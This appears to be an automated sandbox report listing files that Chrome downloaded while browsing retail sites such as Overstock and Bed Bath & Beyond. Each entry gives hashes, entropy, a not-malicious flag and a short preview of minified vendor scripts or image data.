                                                                                                                                                                                    SHA-256:A5C3D4EE8F7207D2E5638C38C05EC09134B202C5F414926D311006E7BF4945CB
                                                                                                                                                                                    SHA-512:45EE05A3B6E8E7F0C74096B4A89EC4CFBF82B3E17D07660FE56996F3EA01563511FAD85EF96A96CB6FB6F61C06E816F2AB99EE04CE41B2FB0FBFC0B45CE3C670
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/OnePage.BKvQv9YM.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayWrapper.mG72mrD0.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","context.C2MjukUF.js","usePreselectSpi.Dc56ArDd.js","useIsOriginatedFromShop.7toB9y1y.js","Section.Dvvun2gq.js","assets/Section.sQehCocD.css","publishMessage.CX0yXme-.js","ShopPayLoginLoader.DsmWyqS8.js","assets/ShopPayLoginLoader.CjGSo8kt.css","PayButtonSection.DAi6V-5g.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.cjqea2Mu.js","RageClickCapture.BAiET0lR.js","MarketsProDisclaimer.D4Dihv-c.js","assets/RageClickCapture.DnkQ4tsk.css","assets/PayButtonSection.DF7trkKf.css","DeliveryMethodSelectorSection.HuQ_vE9w.js","useUnauthenticatedErrorModal.AwvSMfsF.js","LegacyVaultedShippingMethods.CLlWtWZU.js","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","index.2zVq00Bx.js","PickupPointCarrierLogo.Dit2gzD9.js","assets/PickupPoint
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61494
                                                                                                                                                                                    Entropy (8bit):5.50917747969663
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIe:uYW2Pj5yO7t2ACRg8398vD
                                                                                                                                                                                    MD5:678CDF27A140D6C9EC96FF5F97F5568B
                                                                                                                                                                                    SHA1:D71B1CDEA4B27AB427A9BABCF4D950FF77D18EE8
                                                                                                                                                                                    SHA-256:F1E7D192EC9DF668689534D5B4ECAEFBD9213217242078E48ACD0F5BC574465A
                                                                                                                                                                                    SHA-512:CEA191D11B47A96CD5CECCA0F7F2EF4B79B5B650F64CA7952095260E99E7F4F971C8480EFA59457B914C3BE65C3123917B2A262645CD09514077BB0654C208D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1789
                                                                                                                                                                                    Entropy (8bit):5.177113566186224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uBG6L4YisqwTNjscsEdBZxCriQb6sL9isUx9ocpOBbS3DXQCzBbdByBQJD:uM6hTZs0BZA+U6wosU/1pOB+3DXHBZBd
                                                                                                                                                                                    MD5:33A4A0842739201FE8D314C6C48BF408
                                                                                                                                                                                    SHA1:1AB8D77E4D86FCA4882F24D9405A673E8EF0FD73
                                                                                                                                                                                    SHA-256:FF1082D7C1F055F71565D47208D92F4D8E4FEA909B02DDFC267D9C05F0E37475
                                                                                                                                                                                    SHA-512:EA2C07B574A7D01120924C956AA934B974143E83EC8C404CC9B5AF890BF268BB05B07F1A5D5505F337C21222D016BA279722658B9C1B3C4C29421DC50118749E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(t,c){const n=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(n){return}if(typeof c!=="function")return;function i(){var t=null;if(window.braze!==undefined){t=window.braze}else if(window.appboy!==undefined){t=window.appboy}return t}function a(){const t=new URL([...document.getElementsByTagName("script")].map(t=>t.src).find(t=>t.includes("braze-cart-script")));const n=new URLSearchParams(t.search);return Object.fromEntries(n.entries())}function s(t,n){const e=decodeURIComponent(t);const r=e.indexOf(n);if(r!==-1){return e.substring(0,r)}return t}function e(t){var n=t+"=";var e=document.cookie.split(";");for(var r=0;r<e.length;r++){var o=e[r];while(o.charAt(0)==" ")o=o.substring(1,o.length);if(o.indexOf(n)==0)return o.substring(n.length,o.length)}return null}function r(e){const r=s(e,"?key=");const o=localStorage.getItem("cart_token");i().getDeviceId(function(t){if(e!=null&&r!=o){localStorage.setItem("cart_token",r);const n=a();c("https://"+n["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):116513
                                                                                                                                                                                    Entropy (8bit):5.34426438977711
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:eJuyfE/+IV8rKrXLlciGW+G2VTKAdRlAmKMaV9nrl80/SvKcAxAMQLxC1QLWHuC6:+DsxX+G2VTKAVtvKjWMp1iWu
                                                                                                                                                                                    MD5:F74D2C1D7F7B2041E00F0347C7D2D5F8
                                                                                                                                                                                    SHA1:ABE7F23DFC882240C6641B061A84AFF68FDEAB5D
                                                                                                                                                                                    SHA-256:A3C053D11506F3F1EF0795F89739C8A0F99E4E2D50FC05205B4EC0A818A32C57
                                                                                                                                                                                    SHA-512:EB4D8E401D7EEA9F625A04D3B1DEFD7856A5EC31ECE9B67A806924EFB34D4B3FE879C0900905F16012A2903E2533A0D9BD4B153C87918623ABF219B9C66D7E00
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e={1644:function(e,t){"use strict";function n(e,t,n){try{var i;r({error:e,context:t,shopId:o()||(null===(i=window.Shopify)||void 0===i?void 0:i.shop),notes:n})}catch(e){}}function o(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function r(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key","95ba910bcec4542ef2a0b64cd7ca666c"),t.setRequestHeader("Bugsnag-Payload-Version","5");const n=function(e){const t=(n=e.error).stackTrace||n.stack||n.description||n.name;var n;const[o,r]=(t||"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o||"").trim(),message:(r||"").trim(),stacktrace:[{file:"consent-tracking-api.js",lineNumber:"1",method:t}],type:"browserjs"}],context
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                    SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                    SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                    SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4717), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4717
                                                                                                                                                                                    Entropy (8bit):5.0231454692467095
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:x9yTUdsZTmzDXHyHkz/93yN1X6VA/+fO/HYU1:nyTUCSDHyHW/93yNtmAm2/N
                                                                                                                                                                                    MD5:9A39012D8B21FD48BC886557A71DE05B
                                                                                                                                                                                    SHA1:0513D36ADD1A40C327DCEDBF6740400143BDF3E7
                                                                                                                                                                                    SHA-256:2432D4D714F569FB026AC1272B385CC0C13A5C820AB4AE88E907B4DCC13C8F9D
                                                                                                                                                                                    SHA-512:BA6D35BDDF90FF260C3388C247EF6ED9F97938471F2D6FBF97E741FC5809B7FAECACA6454958AC4DE21459CFF2A6C6A8E52EE4EAF4915198F4264F7F14C1C8FC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-web-sdk-script.min.js?api_key=dc9d7751-8184-4d73-92ba-bc7abcb22008&content_cards=false&in_browser_msgs=false&sdk_url=sdk.iad-03.braze.com&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}const t=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-web-sdk-script")));const s=new URLSearchParams(t.search);const r=Object.fromEntries(s.entries());if(!document.querySelector("script[src*='braze.min.js']")&&!document.querySelector("script[src*='braze.no-amd.min.js']")&&!document.querySelector("script[src*='appboy.min.js']")&&!document.querySelector("script[src*='appboy.no-amd.min.js']")&&!window.braze&&!window.appboy){+function(e,t,s,r,o){e.braze={};e.brazeQueue=[];for(var n="BrazeSdkMetadata DeviceProperties Card Card.prototype.dismissCard Card.prototype.removeAllSubscriptions Card.prototype.removeSubscription Card.prototype.subscribeToClickedEvent Card.prototype.subscribeToDismissedEvent Card.fromContentCardsJson ImageOnly CaptionedImage ClassicCard ControlCard ContentCards ContentCards.prototype.getUnviewedCardCount Feed Feed.prototyp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (18850)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18865
                                                                                                                                                                                    Entropy (8bit):5.187115085468122
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:gggIoLxpxNRGwUhJB95bFH8dUT+RCgsxZ26Cm168ePJLakOQKq3:8Lxb3hEJBPNsRseFP
                                                                                                                                                                                    MD5:9C5D1B58EE551D992D10FED3A5972EB9
                                                                                                                                                                                    SHA1:26596A5222F80A3E544B283B112D05479FE16ACA
                                                                                                                                                                                    SHA-256:2FAEE16B7095F268D3A3B7A7F912CB02D370C5E582C6AAC28DA24AAFEC87EC61
                                                                                                                                                                                    SHA-512:9A2A747C6810D71860EE3698B6061A7A35B6A1CD7BFADA5A2F263215FE2C8B64545AB086FB690B8C1713954E7B56F28A5C43D75ED87F3A2884BF4E781BE825DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart||e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete||e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t||100)-1)return n||i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1360
                                                                                                                                                                                    Entropy (8bit):6.510624590956784
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2TCIl/X2YlXWI2PUnFAXxpOpO2K8da7maTJJn8X:bIl/XflpyXxp52K8da7mqmX
                                                                                                                                                                                    MD5:188BA985F75AE4504FAC105BC5DD2A2F
                                                                                                                                                                                    SHA1:906D1A007F2BFAC37716B6F0AD7A1A2C704DF592
                                                                                                                                                                                    SHA-256:B27212C21401ABCF2C5409F1194D7EAFCF65BEF327182EBAF8A5BC044F13D2A1
                                                                                                                                                                                    SHA-512:86539A4F1BE20B48AEEB3528ECEF56892A20207431DA1F4BFB5412C7EC3B107C612C175050E746C2E055023A3E65C3A819F731DBA1B21573E7247489AAEEC5F3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_b9f71854-0de7-4cdb-8405-944c6b04d197.jpg?v=1729325107&width=80
                                                                                                                                                                                    Preview:RIFFH...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!./....X.4......R.........?h..z?..w.?e.""..9.E..Eg..kH.c....(:#.O..!.L%...=.S`8..N.<...k..... .#....l...`.Rf...V......x..4...T..qo...86!0.=....Z._.dm.L.m.....".K_...&.*w.E..KN%......Y..v....r...gY.....2.........Mv......$A.. ../.....6/...o;...~.,+.M......$X?.e..#.P..0/.?..i;...o...;...go.Z.f.).n..CR..|O17#..N.y,.^....%...X/`f...{..b.G.f..?...=.G`....6......z.Q.I..]G@H..!.&T.+k...$.|!..,V#S.. 9V....J\.g@....o...+.<//...)t.0.VrC..4u....`..{..M.S..in....i....^......0.L.$..}L.5.Q.p.Pcv
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1048576
                                                                                                                                                                                    Entropy (8bit):7.867719586445836
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:ZEuBRCKMAnFoMPTGzZrRyZxTMPGvAVcUo8VEDFJ/r/eWViS4Fo5XorvkgvtUHrHu:ZEMdx+Zr0TqcyGTRVdcRtUHrN9UX
                                                                                                                                                                                    MD5:3C3D538CF397E9E712AAC5C202D1CF05
                                                                                                                                                                                    SHA1:60869C8BD714009408F625AFC8C56844A1D62F9C
                                                                                                                                                                                    SHA-256:ABB027ABCE24C335684700C6524CAC203D46B15B26DB644EC69A329B3F56FAC5
                                                                                                                                                                                    SHA-512:C7814DF9F62C2FFE37653806538A07DD403FC08FD71AC5B215378FAA5481E782B5185E2AF49D0F6510A85521A0AA9263B765A6963BDABA7DEDAA48AED6E6A556
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/video/homepage/10162024-MOPS-V3850x447_DesktopA1_2024_BBB_HomefortheHolidays_BKG_V2.mp4:2f8447e3ce2bbd:1
                                                                                                                                                                                    Preview:t^|....xS.11..rn..J.ARX.7....l..kV...R.x..I..u.^.i.aT!}....N.]T:...X.!.o.'B..).......=2....d.U.j..W#..n.!.A&.....%...3FX......a..3H....V..!K..,K?.0..U$.F...W.HD...:..B[.$U...l,...t.o..5....%.....$...I...2..(...%...\Q.....]...f......p..mIY`..-5.....g.m...r-dBA-..9.m.j.>...v../g.l.E4.]0Dl.=S*.x...E.w....}\.p.I._.Zo.L#.z.Z.n...1.v..l]&...01.L...%.^.iz..1O9x. 2..O~t.M...7...../.b..z..h2.3.he6$0.885Q..:......0....L.... G..S.0X.<.......^..=...Y..<j.4....RL9.=.*i..+d/...|..K..Qii..#b.......x.........M.O7QDY..M.......sK.....^.T.S.m....r........b7b?..V#...F.F...!..s.x...0.D......&G...,.\E'..C.q..>...!...ep.....U.}.u...*N.=.K..7_}/'.4t]....m.C.~.?.h..r....En..Tg..5C....Af!gt....*xv..<.~..vl@.^)6.4:p..PB.]\...F...k......]q.=..a........4...fE"......o....3b.b..-..A...uQ..Iu^.h..5.J.....g*...b.....}..'B..x.A.u.,..h......F...>w..~@K......./:Ip....2..Q...-%.Im....n.JKG.V2.....j..%h4.......B.S.t..Y..e....P..4..j.|........n....s............OdG..5....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1896
                                                                                                                                                                                    Entropy (8bit):7.056698584544129
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:wTCIl/X2YlXWI2PU5Ze4gE/+ke4Jjvp69r/HrMH6wYOaA22zZHUUh8oLfCLGF2HW:VIl/XflbZe1xkeUvp65Kz3qL0b
                                                                                                                                                                                    MD5:F13B5BB49A7F71C4542D9BD880BC7F43
                                                                                                                                                                                    SHA1:E8888F1ABB785F9BA43FCEB0E813C69214A22B1D
                                                                                                                                                                                    SHA-256:EBA48F8A795A5BCCB6EB331BC747E1C13019B45DF70BB948B6AA09AE67647887
                                                                                                                                                                                    SHA-512:181E216C88D86CB8537166E399DBF6A0C0626655DF5723AF67D2C8F65F76D7D60366E9FF4D55B0F21EB985FFA805A725DA94D4EDF7744C1AF786694CA0921570
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_418ca0cc-5f10-47f6-abb6-96e5c7ed3a98.jpg?v=1729322979&width=80
                                                                                                                                                                                    Preview:RIFF`...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*P.P.>1..C"!!.).X ....f#.ivN.........u..`.|....... ..3B.I.n].99.ZV..A...7*......|..2...-..}...Lw...y..#~.`H...?o...x...j$....&H.^..<f.~.F.O.Y..5Z.s{...-6FE..$..k@#)W.......OY9.X.........\..y...1h....Q.Z7Qi.r....._....t.=.....0.%{.\.........J.G.wP..|.v.=sc?B!.<#<....)..:B.?...'.=.(t..lan.0....._..ya..d....U..o......a.N.x...f.....;..g{.9..=......W.....<..5.[...Dh/q....<...<z.....>Z.N.g...(..S.@...r_..<U.*.....Z.d..z.....!.#.P...6.......'.f2L8.] .............9dX9V........~\.e.S......;.6.T9o...RF...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69642
                                                                                                                                                                                    Entropy (8bit):5.334305812952832
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicxaQ:RIT7Vs9ZVKBYj8wKcHxaQ
                                                                                                                                                                                    MD5:754433E51375DDE6A59193B79BD06871
                                                                                                                                                                                    SHA1:43F10CE5D1703F38F7182B9D657E20FD136F8C86
                                                                                                                                                                                    SHA-256:80EBE181716FB558B4A9C3A202FA2CC6F0DAD4A06160560A21473D423C9A3A27
                                                                                                                                                                                    SHA-512:BBCC6DADCF84B656CE502F8EBD36DA052C634C8327E11925EDE3D6D50F484BA5A5A221CBD6AF87561EAC9E6BA868163D5D57DE6746EA243D1C06E18B8A3C5BA8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://connect.facebook.net/signals/config/639653892787185?v=2.9.174&r=stable&domain=www.bedbathandbeyond.com&hme=ead923021ccd3483ef3b9b04703d0a78b943fbdc01e8d7cec21c5059f1f4a5e9&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C194%2C193%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1256
                                                                                                                                                                                    Entropy (8bit):6.3259541867615745
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:FTCIl/X2YlXWI2PU82GMFPuYBCg0vyQylYFNfmLyjA:sIl/XflakFPuYBziyrMTs
                                                                                                                                                                                    MD5:DF3C39D27747C08762D68BB7FFC9DDD9
                                                                                                                                                                                    SHA1:A58E6776D754941F78FF09AAE0CC4E328615CB87
                                                                                                                                                                                    SHA-256:C230653BE7F60EA7A1DC8EF691F77C808991651509F0C9AF46FC7D6266F7B49A
                                                                                                                                                                                    SHA-512:A92B054166F2EE2C24367C53F25A9B70F3F811BAFC15CFC827022B049938E67D3E9505573D9F7ECFC6C8CB953E883A048263A07C146D58C60BA3D5B3D43632A0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_cffc26b1-1b15-4c53-9d6e-945adc1683b3.jpg?v=1729325194&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 P........*P.P.>1..B.!!.... ....i......,.>....<...$D7,....i..zz.s.h%.+/....(......'8}.....D.m.'^H+.t. 9..T...n.........d. .J..K......X.m........%,qL.W.9.:....~..!...f...H...S..t[..B>cw/l.qk.ao..#........~.I...Y.1n?..=..A..MW.|......W.{....\l.3....2\..LeCf9 .W...n.>....#.".Q#...8...r...j..p..S.8.n.7F+...W....G*.j=M.....Zq.t..Wvwsc[T.9...rg..f[Xf.$...D"V...-.{.I...]...|.. ..[....g.D..Xr../...Gg.=M..e...x......p..~....FP@.~{5.T........W.O.4...W.B..iA....!.#.W..L...S...'TX?z'...dncA.w....0....C='..i...(}p.lk.....7.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1392
                                                                                                                                                                                    Entropy (8bit):5.858504370057318
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZADFYzDj0NJVg6cbJ37+GkNkmh3:NBIl/XflVxWDFGX6w6mr+GkNkW3
                                                                                                                                                                                    MD5:973FE593D90F4A7EF2F49F879A0F2544
                                                                                                                                                                                    SHA1:A8D453338164D97EA1695EF2B4A9AB80C73D98B9
                                                                                                                                                                                    SHA-256:91CA4B8117376F259C8DAD5F177C8849F9C868EF5AF861537263CE8916A48168
                                                                                                                                                                                    SHA-512:F0B95C0E848BA11E541D3A960CBD13CE6B7FF6F85051FFC1512AA61B5428A1353917AA0675E32EB8EB826DBB3A6ED0619C6923CF10828170B8733193BF9320BB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................,.........(.. ttC..lS3.............35..................5.......................!1.Qq..2a.. "3@A.......$BRSr........?..y..F...<k.....S....9!..@1W
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1186
                                                                                                                                                                                    Entropy (8bit):6.191916699710278
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:oETCIl/X2YlXWI2PUeiVfVH6kqm2Xen+mMY0XVSfoZMNE8:oBIl/XflwMfdPqm2Xe+UWIfoZQE8
                                                                                                                                                                                    MD5:C20988CA0E01A5F1B84937FD5BB6E01F
                                                                                                                                                                                    SHA1:82F6710C32A674CF92FDDF3F2D2316752261E317
                                                                                                                                                                                    SHA-256:F0CF79506D03D1E36119972425CD0D0D5B0A032A65FC22759D22BA1D3FEF8F97
